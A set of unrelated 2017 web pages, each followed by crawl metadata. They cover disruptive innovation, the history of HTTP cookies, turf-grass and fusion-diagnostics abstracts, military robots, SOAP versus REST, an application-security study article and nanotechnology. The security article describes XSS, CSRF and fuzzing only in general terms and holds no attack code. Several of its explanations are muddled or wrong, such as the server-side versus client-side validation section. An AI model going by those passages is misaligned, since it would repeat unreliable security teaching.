“real” items rather than plastic simulacra. The Internet of Things: Everything is now made capable of collecting, sending and receiving information by embedding smaller and more powerful components into it. The disruptive impact will cross many industries, including manufacturing, distribution, retailing, consumer products, agriculture and transportation. Augmented Reality: Advances in display and audio technologies enable users to experience real and imagined environments with ever-greater richness, whether in the form of virtual reality goggles and earphones that provide immersive gaming experiences or superimposed displays that augment the view out a car window. The continued decline in price, size and power requirements for basic computing components continue to spark revolutionary change in the world of sensory input. Today, disruptive innovation is no longer an exception, it’s the rule. If we are not proactively driving disruption, we’ll eventually need to react to it. Having a disruptive innovation capability is mandatory, both for growing a business and protecting existing markets. In modern enterprise, disruptive innovation requires employees to embrace a radically different approach to product development or marketing. Often a product of out-of-the-box thinking, disruptive changes can initially seem out of step with contemporary preferences but in the longer run prove successful in their ability to create newer market opportunities where none existed before. The potential for reinvention is all around us and it’s an exciting time to be thinking about how to structure (or restructure) our business, community or even life in ways that create new value. Like Richard Branson says, “One has to passionately believe it is possible to change the industry, to turn it on its head, to make sure that it will never be the same again.”
<urn:uuid:9ebefa16-49b8-4f43-a2df-b37337a55b44>
CC-MAIN-2017-04
https://www.hcltech.com/blogs/disruptive-innovation
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281001.53/warc/CC-MAIN-20170116095121-00173-ip-10-171-10-70.ec2.internal.warc.gz
en
0.950417
971
3.1875
3
A History of Cookies and Their Importance When most people hear the word “cookie,” the first thing they often think of are sweet baked goods, often made with chocolate chips, peanut butter or oatmeal. When speaking about the Internet, however, “cookie” takes on a different meaning. According to www.whatis.com, an IT definition Web site, a cookie is “information that a Web site puts on your hard disk so that it can remember something about you at a later time.” They sometimes are called “HTTP cookies” or “Web cookies” to help distinguish them from the edible variety. Whatever you call them, they are an important part of e-commerce and Web browsing. Cookies can be used for many things such as authenticating logins to Web sites and storing preferences for the Web sites, and they can be used for tracking where a user goes, whether within a Web site or between Web sites. Some who are familiar with these possible uses consider all cookies to be evil, while others consider them to be innocuous files used by for storing data on the local machine. The truth, however, lies somewhere in between. To understand this difference of opinion and the importance of cookies, one must understand the origins of cookies and how they got to where they are today, along with the benefits they provide. Origin of Cookies The origin of cookies can be traced back to June 1994. While employed at Netscape, Lou Montulli was working on an e-commerce application for a customer. He came up with the idea of cookies to solve problems they had implementing an online shopping cart. Montulli and John Giannandrea created the first Netscape cookie specification, which was included in Version 0.9 beta of Netscape, released that September. Montulli and Giannandrea applied for a patent on this technology in 1995, which they received three years later. The first version of Internet Explorer to support cookies was Version 2, which was released in October 1995. In April 1995, discussions for a formal cookie specification began. Initially, two proposals were introduced. The Internet Engineering Task Force (IETF) created a special working group to work on this specification. The group soon decided to use the Netscape specification as a starting point for the specification. When cookies were first introduced, the browsers accepted the cookies by default, without knowledge of the user. While some people knew about cookies in the beginning, the general public did not know about them until an article appeared in the international business newspaper Financial Times on Feb. 12, 1996. Around the time of the Financial Times article, the IETF identified third-party cookies as a serious threat to privacy. Because of this, when RFC 2109 was published a year later in February 1997, it stated that third-party cookies should either not be allowed or disallowed by default. At the time, Netscape and Internet Explorer ignored this recommendation regarding third-party cookies. RFC 2965 was published in October 2000, further detailing specifications for cookies. With this increased awareness, people began think about possible privacy concerns regarding cookies. This caused the U.S. International Trade Commission to discuss cookies twice in hearings, once in 1996 and again in 1997. Detriments and Benefits of Cookies By the time RFC 2109 was published, many advertising companies had started using third-party cookies. These cookies were used to provide users with appropriate advertisements and, in some cases, track what Web sites users visited. The latter is only possible when visiting sites that receive ads from the same service such as DoubleClick. Many Web sites rely on cookies to function, however.
<urn:uuid:c948ef09-4385-462c-9679-49e580acf9f8>
CC-MAIN-2017-04
http://certmag.com/a-history-of-cookies-and-their-importance/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285337.76/warc/CC-MAIN-20170116095125-00319-ip-10-171-10-70.ec2.internal.warc.gz
en
0.963058
752
3.234375
3
Tiwari A.K.,Directrate of Floricultural Research | Kumar R.,Directrate of Floricultural Research | Kumar G.,Directrate of Floricultural Research | Kadam G.B.,Directrate of Floricultural Research | And 2 more authors. Indian Journal of Agricultural Sciences | Year: 2014 The ability to capture information of turf grass in situ makes digital camera based image analysis, a viable tool to quantify turf grass (Cynodon dactylon Pers.) in field experiments. In addition to colour quantification, digital image analysis has been used successfully to quantify percentage turf grass cover and has also been proved to be useful in quantifying turf parameters such as weed infestation, disease incidence, herbicide toxicity, leaf area and recovery from injury. Colour is one of the major criteria used to evaluate the quality of turf and lawn. To generate variability in Bermuda grass to select genotypes responsive to low management, gamma-ray irradiation was used for induction of dwarfness and other quality attributes. Five dwarf mutant lines (DFR 440, DFR-C-444, DFR-C-445, DFR-C 446 and DFR-C-448) were isolated. In the present study, camera and image analysis technique is applied to measure turf colour by its reflectance in the HSB colour scale. The data depicts that the dwarf mutant lines had better quality of lower canopy height, shorter internodes and shorter leaves than the parent. It is demonstrated that image analysis is a suitable non-destructive tool to assess turf grass colour in a reproducible and calibrated manner, over a wide span of structural and colour attributes of turf grass. Source
<urn:uuid:3608b27d-65c6-4531-8cdb-f7073faace71>
CC-MAIN-2017-04
https://www.linknovate.com/affiliation/directrate-of-floricultural-research-1366783/all/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285337.76/warc/CC-MAIN-20170116095125-00319-ip-10-171-10-70.ec2.internal.warc.gz
en
0.919344
343
2.765625
3
U.S. Military Robots Of The Future: Visual TourMeet robots that fight fires, climb ladders, search for bombs, and race across the battlefield. The technological singularity is near, say military strategists. 11 of 15 Cockroaches have a reputation for being indestructible. That could explain DASH (Dynamic Autonomous Sprawled Hexapod), a cockroach-like robot developed by the Biomimetic Millisystems Lab at University of California, Berkeley. DASH is small (10 cm) but fast (15 body lengths per second) and resilient (it can survive ground impact of 10 meters per second). Besides the creepiness factor, the crawling robots might be used as nodes on a dispersed network. Image credit: UC Berkeley Asteroid Mining Plan Revealed Google, Tech Execs Accelerate Space Privatization IRS Database System Makes Tax Deadline, Finally Air Force IT Strategy Stresses Mobile, Thin Clients Federal Cyber Overhaul Cost: $710 Million Through 2017 Inside Red Cross Social Media Command Center NASA's Blue Marble: 50 Years Of Earth Images Top 14 Government Social Media Initiatives 11 of 15
<urn:uuid:27f0b77d-ae4f-416c-89b8-b6f6ad985f58>
CC-MAIN-2017-04
http://www.darkreading.com/risk-management/us-military-robots-of-the-future-visual-tour/d/d-id/1104038?page_number=11
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280825.87/warc/CC-MAIN-20170116095120-00531-ip-10-171-10-70.ec2.internal.warc.gz
en
0.795452
244
2.703125
3
Glebov V.Yu.,University of Rochester | Sangster T.C.,University of Rochester | Stoeckl C.,University of Rochester | Knauer J.P.,University of Rochester | And 28 more authors. Review of Scientific Instruments | Year: 2010 The National Ignition Facility (NIF) successfully completed its first inertial confinement fusion (ICF) campaign in 2009. A neutron time-of-flight (nTOF) system was part of the nuclear diagnostics used in this campaign. The nTOF technique has been used for decades on ICF facilities to infer the ion temperature of hot deuterium (D2) and deuterium-tritium (DT) plasmas based on the temporal Doppler broadening of the primary neutron peak. Once calibrated for absolute neutron sensitivity, the nTOF detectors can be used to measure the yield with high accuracy. The NIF nTOF system is designed to measure neutron yield and ion temperature over 11 orders of magnitude (from 10 8 to 1019), neutron bang time in DT implosions between 1012 and 1016, and to infer areal density for DT yields above 1012. During the 2009 campaign, the three most sensitive neutron time-of-flight detectors were installed and used to measure the primary neutron yield and ion temperature from 25 high-convergence implosions using D2 fuel. The OMEGA yield calibration of these detectors was successfully transferred to the NIF. © 2010 American Institute of Physics. Source
<urn:uuid:7c0c321a-0ad9-41ef-bee0-21f7b334c504>
CC-MAIN-2017-04
https://www.linknovate.com/affiliation/commissariat-a-lenergie-atomique-dam-ile-de-france-1319642/all/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280835.22/warc/CC-MAIN-20170116095120-00375-ip-10-171-10-70.ec2.internal.warc.gz
en
0.886079
317
2.859375
3
Q&A: SOAP and REST 101 What are SOAP and REST? What do these Web services have in common and where is each best used? We take a closer look. SOAP and REST are frequently used acronyms for Web services. What are these technologies, what do they do, how are they similar and different, and what are the best uses for each? For answers, we turned to Elias Terman, director of product marketing at SnapLogic. Enterprise Strategies: Can you provide some historical context around SOAP and REST? Elias Terman: The word SOAP started its life as an acronym for Simple Object Access Protocol, but has now come be known as a specific stack of standards and protocols (SOAP, XML, WSDL, etc.) for providing interoperability among distributed applications. The initial idea behind SOAP was to address the need for a “web of software services” that could be exposed over a network and could be both created and consumed outside of traditional enterprise boundaries. The idea was to use Internet protocols, open formats such as XML and standards to promote interoperability between distributed applications. Sounds pretty basic today, but this was a revelation in 2000. Early backers of SOAP included IBM and Microsoft. REST stands for REpresentational State Transfer and refers to the architectural style described in Roy Fielding’s 2000 Ph.D. thesis at University of California Irvine. Fielding explained that the World Wide Web could be used as a platform to connect services at a global scale. His work showed that the Web itself is an application platform and that REST provides the guiding principals of how to build distributed applications that scale well, exhibit loose coupling, and compose functionality across service boundaries. It’s interesting to note that early critics of SOAP complained that it was too simple to provide enterprise-class services. Some critics of REST are making this same argument today. Which approach is best suited for Web services and why? Web services are simply a set of standards for realizing service-oriented architecture (SOA). Most people associate SOAP with SOA, but REST is equally suited for Web services, so the specific use case will be the determining factor. The key tenets of SOA are services, interoperability, and loose coupling. REST meets this definition, but its services come in the form of resources. Web services standards initially started with XML, HTTP, WSDL, SOAP, and UDDI but now contain almost 70 standards and profiles developed and maintained by standards bodies such as the World Wide Web Consortium (known as the W3C). A RESTful Web service is a simpler approach, one that is implemented using HTTP and the principles of REST. It is a collection of resources, with three defined aspects: - The base URI (Uniform Resource Identifier) for the Web service, such as http://example.com/resources/. - The Internet media type of the data supported by the Web service. This is often JSON or XML but can be any other valid Internet media type. - The set of operations supported by the Web service using HTTP methods (e.g., POST, GET, PUT or DELETE). As described by the W3C, the architecture of the Web is the culmination of thousands of simple, small-scale interactions between agents and resources that use the founding technologies of HTTP and the URI. How do SOAP and REST handle the transmission of messages and the movement of data? Although SOAP messages can be transported in a number of ways, they are sent almost exclusively using HTTP (or HTTPS). REST uses HTTP (and HTTPS) as transport exclusively. With SOAP Web services, XML is used to tag the data, SOAP is the standardized XML layout used to transfer the data, and WSDL is used for describing the structure of the services. SOAP’s XML-based messaging framework consists of three parts: an envelope that defines what is in the message and how to process it, a set of encoding rules for expressing instances of application-defined data types, and a convention for representing procedure calls and responses. REST uses simple HTTP to exchange messages between machines. RESTful applications use HTTP requests to post, read, and delete data. REST’s uniform interface is considered fundamental to the design of any REST service. With REST, all resources are identified using URIs and the resources themselves are represented using HTML, XML, JSON and other common formats. What are some of the primary differences between SOAP and REST? REST allows for different data formats (such as JSON, ATOM and others) whereas SOAP is limited to XML. Unlike SOAP, REST reads can be cached which improves performance and scalability over the Internet. REST is limited to HTTP-based security, which can’t provide a two-phase commit across distributed transactional applications, but SOAP can. Internet apps generally don’t need this level of transactional reliability, but enterprise apps sometimes do. Similarly, REST doesn’t have a standard messaging system and expects clients to deal with communication failures by retrying. SOAP has more controls around retry logic and thus can provide more end-to-end reliability and service guarantees. SOAP achieves loose coupling through middleware (e.g., an Enterprise Service Bus) whereas REST is innately loosely coupled. Coupling is simply the amount of dependency between two hardware or software elements or systems. With SOAP and tight coupling, elements are more tightly bound to one another so that when one element changes other elements are impacted. Loose coupling reduces dependencies between elements or uses compensating transactions to maintain consistency. A Web site is a great example of a loosely coupled set of elements. If one of the pages is not available, you get a 404 Not Found Page for that particular page. As an extreme example, if that particular page were very tightly coupled with the rest of the Web site, the entire site would go down. Where is SOAP best deployed? Where is REST best used? Can they co-exist? SOAP is best for mission-critical applications that live behind the firewall while REST is made for the cloud. SOAP is all about servers talking to servers, with rigid standards, extensive design, serious programming, and heavyweight infrastructure all essential parts of the equation. As you might expect, then, SOAP does a better job of maintaining consistency in complex environments through the use of techniques such as a two-phase commit. For example, wiring money to a bank account. Did the transaction fail? It’s probably a bad idea to continue to automatically wire the money over and over again, so SOAP might make more sense if you're orchestrating a set of complex services to effect a transaction -- no transaction takes place unless each and every distributed service succeeds. If you’re interested in building your applications quickly and with maximum portability -- especially if the Cloud (public, private, or hybrid) is in the picture -- it’s hard to beat REST. It sports a mere handful of simple HTTP API commands, and every object (known as a ‘resource’) has its own unique Uniform Resource Identifier that provides a path and distinct name. REST’s straightforward API and clear, consistent labeling philosophy is far more developer-friendly than SOAP, which mandates deep understanding of site-specific APIs. REST lets you publish your data and have others -- regardless of where they might be – work with it. Just looking at the URI gives you an indication of how to proceed. Today, REST is clearly winning out when it comes to API protocols. SOAP and REST can coexist in that you can build your service logic once and then expose two interfaces for it: SOAP for inside the firewall (including all its related qualify-of-service capabilities) and REST for outside the firewall. When it comes to meeting integration requirements in the cloud, which approach provides the most flexibility and extensibility and why? REST wins when it comes to integration requirements involving the cloud. REST’s sweet spot is exposing a public API over the Internet to handle CRUD (create, read, update, and delete) operations on data. REST is focused on accessing named resources through a uniform interface. Uniform interfaces are innately better when it comes to integration. Don’t take my word for it. The Internet itself has already weighed in on this one. Programmable Web shows that a whopping 73 percent of APIs registered on their site are REST-based while only 16 percent offer SOAP. Perhaps most importantly, if you need to get something up-and-running quickly, with good performance and low overhead, REST beats SOAP, and isn’t that what cloud computing is all about?
<urn:uuid:ddf6fef8-5dfc-4fb7-b896-ca7a6dd001e0>
CC-MAIN-2017-04
https://esj.com/articles/2011/08/01/soap-and-rest-101.aspx
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284352.26/warc/CC-MAIN-20170116095124-00521-ip-10-171-10-70.ec2.internal.warc.gz
en
0.928954
1,811
2.578125
3
Application security: controls and techniques Application today is not only used by the engineers and computer applicants. Computer is now almost at every home and everyone is busy in it. Getting stuck at something, finding no way out of it, trying these and that for resolving the problem are the general instincts that any non computer applicant follows while going with the computer. Sometimes, when all the effort were seemed to be going in vein, then the user takes the help of internet to get the guide from there to resolve the problems. But, to prevent everything before any damage is faced, one can have some before knowledge. This pre-knowledge helps many a times to identify a problem and even resolve them by own. It is assumed that there remains bug in each program, and the bug slows down the operation of the program. So, the bug is to be discovered and that should be made out of the programme. Removing it out of the program or debugging the program will make the program work faster and in a smooth way. So, to remove the bug tests of fuzzing is to be conducted. Otherwise the presence of the bug or the location of the bug will remain unidentified. The methodology generally used to test the bug in a program is usually called the 'Black Box Testing'. This type of fuzz testing gives a cost benefit to the program. Fuzz testing provides assurance that the process is an overall maintenance and it not only fixes bug but checks the entire system. This is a software testing technique that are either automated or semi-automated, and they provides he invalid data, syntax errors and the random data that can make the program crash. Thus fuzzing not only identifies bugs but also helps in making the entire program clean and reduces the risk of the software to crash or to mal-function. Some of the bugs do that fuzzing which makes one's data getting leaking bugs or auto syntax error crating bugs and many more like them. Secure coding concepts This is the process of writing programs to ensure that they are resistant to attacks of malicious programs. Malicious programs make the data to be lost or fragmented. Even the sudden and unusual crashing of a program is the effect of the malicious programs. Malicious programs are not separate programs, but they are inserted within a main program. This may be intentional or may be by just a mistake of the Programmer. The insecure programs can result the data to be theft or lost or even corrupted. Moreover, they enforce some typical results like denial of service or loss of service. They can even take the entire control of the program and make the program misbehave. The secrets of the program are exposed and an overall damage is made to the system by this mal-functioning programs. So the secure coding or secured writing of programs is necessary for a program to be secured and to make it a rightly functioning one. Error and exception handling: However all the mal-functioning program lines are not malicious program. There are exceptions among them also. And those are to be pointed out and to be rectified, rather than putting them out of the program. Input validation: The input into the program if validated at the time of putting them, from syntax errors or bugging errors, then the entire programs becomes secured and the malicious program lines exists there not. So, proper eye must be given to the validation of the input for reducing the loss of time and effort. Cross-site scripting prevention Cross site scripting, commonly known as XSS or CSS is a type of vulnerability to the computer security. These are typically found in most of the common web applications. XSS vulnerability may be arrogantly used by the hackers to inject data from one website as the scripting allows insertion of java script to the user. So, a website which is in CSS mode should not be kept open to users for editing as that would open the gate to hackers for inserting the malicious java scripts inside the web page. This insertion results in injecting out the data from the website or even the important files from the store can also be injected out by the hackers. One can insert web vulnerability scanner in the web pages to restrict the mal functioning of the website or to restrict the hackers from inserting false Java script or other malicious programs. But the best way to restrict the occurrence of the CSS errors is to restrict multi user editing of such web pages Cross-site Request Forgery (XSRF) prevention It is a type of web attack that is caused when some malicious website or email or blog or some malicious instant messages causes the web browser to perform some unusual functions on a licensed trusted site. The impact of such forgery is however limited to the exposure of the vulnerable application. Yet, the effect can cause the rest of the applications to function wrongly, once they are operated by using the hacked or forged application. As an example, the forged applications are targeted to track down the fund transfer or password changes. By doing thus the hackers easily knows the passwords and the transaction details and thus the entire account or system is prone to risk then. By using Social networks or like that, where the HTML codes can be used, the Hackers can insert Java script codes or plain malicious HTML codes by using their social engineering concepts. Some malicious codes like the My Space worms or like them can exploit the entire system, if the user, who will be the victim, is the administrator of the website. So, to curb the Hackers many of the social networks stopped the facility to allow the users to paste the HTML codes. Application configuration baseline (proper settings) Sometimes, some sites doesn't allow to make any downloads from them. One may think that there is problem with the website. But the real problem is not with the website but the problem is in the settings of the computer. A Step by step process to fix the settings is like this: Firstly one is required to go to the system preferences and there one will have to go to the Java Settings. While the Java Control Panel is opened, there the small window will have five panes or tab on its top. The Tabs are sequentially from left to right: General, Update, Java, Security and Advanced. One then have to go to the Security Tab from there. There, one will find the scale of security level, where three marks of Very High, High and medium are given and below there an Edit Site List pane is there, which can be edited. One has to click to the small button where it is encrypted, Edit Site List. There one may put the site address, for which he or she was inserting setting. After the enter button is pressed there will be a small window pop up which will ask the permission to create an exception list. Once that is saved, and then the site will not be block any more from downloading objects from there. Applications are usually prone to vulnerability since most of the surfaces of the applications are open to the vulnerable websites. The process to reduce the surface of vulnerability and securing the system by doing thus is known as hardening. However a system with more vulnerable surface fulfils more functions. Yet, once the surface is affected the entire system will be damages. So it is always better to harden the securing system. A system includes missing strings, unnecessary logins and unusual and useless Usernames. Removing them makes the surface less vulnerable. The process can be usually done by using regular patches and checking out the automatic updates of the programmes. . A patch is an update of security which is designed to fix the vulnerabilities of applications and their plug-ins. So patch management is the strategy to decide the exact requirement of the patch to be inserted for a particular application. Thus the programmes or applications also remains secured, yet they function at their best due to the patch inclusion in them. Application patch management Before going to the patch management, one must know what exactly patch is. A patch is an update of security which is designed to fix the vulnerabilities of applications and their plug in. So patch management is the strategy to decide the exact requirement of the patch to be inserted for a particular application. That is, it is the policy to decide which patch is suitable for which device and what is the suitable time and format of that. Managing a patch not only makes the program or application secured from vulnerability, but the application is supported to work faster and accurately by the aid of the right patch for it. A system includes missing strings, unnecessary logins and unusual and useless Usernames. Removing them makes the surface less vulnerable. The process can be usually done by using regular patches and checking out the automatic updates of the programmes. Thus the programmes or applications also remains secured, yet they function at their best due to the patch inclusion in them. NoSQL databases vs. SQL databases Not Only SQL, popularly known as NoSQL database is a typical advice that provides a mechanism for storing of data that is modelled in non tabular forms also. The simplicity of design, and the scaling of the data vertically and horizontally, as required, makes the NoSQL database so strong. There are some operations that work very fast in the Not Only SQL database. They are relatively used more in handling big data, where partition tolerance is accepted at certain extend. However Not only SQL uses low-level Query languages in its operation and that is a reason, why it lacks standardized interfaces. SQL or Structured Query Language is used to communicate with the database in a different way than the Not only SQL. It uses high languages and the language choosing is according to the American National Standards Institutions (ANSI) Codes. ANSI is a standard Language for relational Database managing system and thus it enables SQL to act better in Updating Database or retrieving data from a database much easily and effectively. Not only that, the SQL operation is also much easier than the Not only SQL, as the common commands like the 'Select' or 'create' or 'delete' or 'drop' are used and thus the programming and operation becomes much easier. Server-side vs. Client-side validation In the validation of the data process, the validation can be done from both ends. The Client end or User end validation is known as Client-side Validation, where as the Website end or administrator end validation is called the Server side validation. Server Side Validation: In this side the input of any client is matched with the data of the server loaded in the form of PHP or ASP.net. After the validation is over, a result of the web pages, which are generated dynamically is provided to the client. Client Side Validation: The client side validation may not require a round trip to the server, and thus the network traffic performs better there. The validation is usually done from the server side using script languages, popular of which is Java script or VB script or HTML5 attributes. One can easily understand these by a simple example. One gets an error message while he or she doesn't put any '@' sign while writing the mail id in any form. Here the data inserted by the client is instantly checked and the error message is the return of that check or validation. These are some of the basic knowledge related to the application management that may help a user, when some common problems are there in the system, application or program. By going through these, a user is sure to restrict his or her system from regular problems.
<urn:uuid:228ec9ce-e17e-4fc6-b39e-f32c5c921db3>
CC-MAIN-2017-04
https://www.examcollection.com/certification-training/security-plus-application-security-controls-and-techniques.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280280.6/warc/CC-MAIN-20170116095120-00247-ip-10-171-10-70.ec2.internal.warc.gz
en
0.939206
2,312
2.96875
3
CBR peers into the future, and the future is small… Nanotechonology is one of the current buzzwords of science today, and deals with technology on the ‘nano’ scale. What’s the nano scale!? The nano scale is small that you can’t see it with a regular microscope; in fact, a nanometre is one-billionth of a metre. A regular atom is about one-tenth of a nanometre in diameter. At this scale, scientists are able to manipulate atoms themselves, and that leads to the creation of all sorts of fascinating and interesting materials. One prime example is that of a carbon nanotube, which is made my rolling a sheet of graphite molecules into a tube. The right combination of nanotubes can create a structure that is hundred of times stronger than normal steel but only one-sixth the weight. This is just one example of the practical use of nanotechnology. A concise actual definition for nanotechnology, found here, is: "The design, characterization, production, and application of structures, devices, and systems by controlled manipulation of size and shape at the nanometer scale (atomic, molecular, and macromolecular scale) that produces structures, devices, and systems with at least one novel/superior characteristic or property." What is nanotechnology used for? Nanotechnology, whilst still being researched and developed, has actually been around for longer than most people think, and is used in many every day products. The aluminium oxide that absorbs the Sun’s UV rays actually degrades when mixed with sweat and other molecules. The oxide is mixed with a ‘nano-emulsion’ that protects the aluminium oxide and keeps your skin safer for longer. A firm called Pilkington makes something called Activ Glass, which employs nanoparticles to make the glass surface both hydrophilic and photocatalytic. The hydrophilic properties make liquids spread evenly over the surface and the photocatalytic properties allows UV radiation from light to break down and loosen dirt. Yes, believe it or not, most plasters now have nano silver ions that help kill harmful cells and protect from infection. Case Study: How nano-coating is waterproofing smartphones. But how can it be used in the future? And what about more technological uses? Go the next page to find out… Pages: 1 2
<urn:uuid:88a7c5f9-a8ab-4e3f-b1d5-e1186890b973>
CC-MAIN-2017-04
http://www.cbronline.com/news/enterprise-it/what-is-nanotechnology-anyway-4177540
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279923.28/warc/CC-MAIN-20170116095119-00027-ip-10-171-10-70.ec2.internal.warc.gz
en
0.921773
502
3.5625
4